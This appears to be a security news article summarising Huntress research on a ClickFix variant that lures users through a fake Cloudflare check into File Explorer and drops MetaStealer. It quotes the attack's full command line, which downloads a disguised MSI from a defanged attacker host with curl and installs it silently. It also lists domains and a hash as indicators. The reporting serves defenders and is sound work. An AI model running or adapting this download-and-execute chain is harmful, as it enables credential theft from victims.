The Shape-Shifting ClickFix Attack: When CAPTCHA Lures Turn Into File Explorer Traps

Security teams face an escalating challenge as threat actors refine social engineering techniques to exploit trusted system workflows. Recent findings from Huntress reveal a sophisticated evolution of the notorious ClickFix attack methodology now leveraging Windows File Explorer and MSI package deception to deploy MetaStealer malware—a dangerous infostealer targeting credentials and sensitive files.

Article illustration 1

From CAPTCHA to Compromise: The Anatomy of a Modern Attack Chain

The attack begins familiarly: victims searching for legitimate tools like AnyDesk land on a spoofed Cloudflare Turnstile verification page. But unlike classic ClickFix attacks—which prompt users to paste malicious commands into the Run dialog—this variant weaponizes Windows' search protocol:

  1. The Fake Verification Lure: Users see a "Secure Access Verification" prompt (

    alt="Article illustration 3"
    loading="lazy">
) mimicking Cloudflare's anti-bot system. 2. **Search Protocol Hijack**: Clicking the button triggers a `search-ms` URI handler, opening Windows File Explorer to an attacker-controlled SMB share. 3. **Decoy Document Trap**: Victims encounter a malicious LNK file disguised as "Readme Anydesk.pdf" (Figure 4). > "This pivot to File Explorer is significant. Attackers exploit user familiarity with file navigation, making malicious actions appear like routine workflows," notes Huntress researcher John Hammond. ## MetaStealer’s Clever Deployment Executing the LNK file initiates a multi-stage attack:
cmd.exe /c start microsoft-edge:https://anydesk.com/en/download/anydesk.exe & curl hxxps://chat1[.]store/%COMPUTERNAME%.pdf -o %TEMP%\temp.pdf & msiexec /i %TEMP%\temp.pdf /qn & taskkill /f /im cmd.exe

Key technical innovations observed: - **Hostname Harvesting**: The `%COMPUTERNAME%` environment variable dynamically generates the malicious PDF's subdomain for attacker reconnaissance. - **MSI Masquerade**: The downloaded "PDF" is actually an MSI package containing: - A CustomAction DLL for installation routines - A CAB archive (`Binary.bz.WrappedSetupProgram`) housing: - `1.js` (cleanup script) - `ls26.exe` (MetaStealer payload protected by Private EXE Protector) - **Parallel Legitimate Downloads**: Simultaneous fetching of real AnyDesk installers creates plausible deniability.

Beyond ClickFix: The Bigger Threat Landscape

Huntress also observed two incidents involving **Cephalus ransomware**, which uses DLL sideloading through SentinelOne's legitimate `SentinelBrowserNativeHost.exe`. This technique underscores attackers' growing preference for Living-off-the-Land Binaries (LOLBins) to evade detection.

Why Security Teams Must Adapt

Traditional ClickFix mitigations—like blocking the Windows Run dialog—fail against these new variants. Defenders should:

  1. Educate users on unexpected system tool interactions (e.g., File Explorer opening after CAPTCHA checks).
  2. Monitor search-ms protocol activations and SMB connections to untrusted hosts.
  3. Analyze MSI packages for hidden CAB files and suspicious custom actions.
  4. Block IOCs from recent campaigns (see table below).

























Indicator Type Description
anydeesk[.]ink Domain Fake Cloudflare Turnstile
macawiwmaacckuow[.]xyz Domain MetaStealer C2
0fc76b7f06aa80a43abafc1e9b88348734e327feb306d700c877c6a210fbd5e7 SHA256 MetaStealer dropper

As attackers blend social engineering with trusted system mechanics, the boundary between user error and compromise grows dangerously thin. Continuous tradecraft education—like Huntress' Tradecraft Tuesday sessions—becomes essential to counter these adaptive threats.

Source: Huntress via BleepingComputer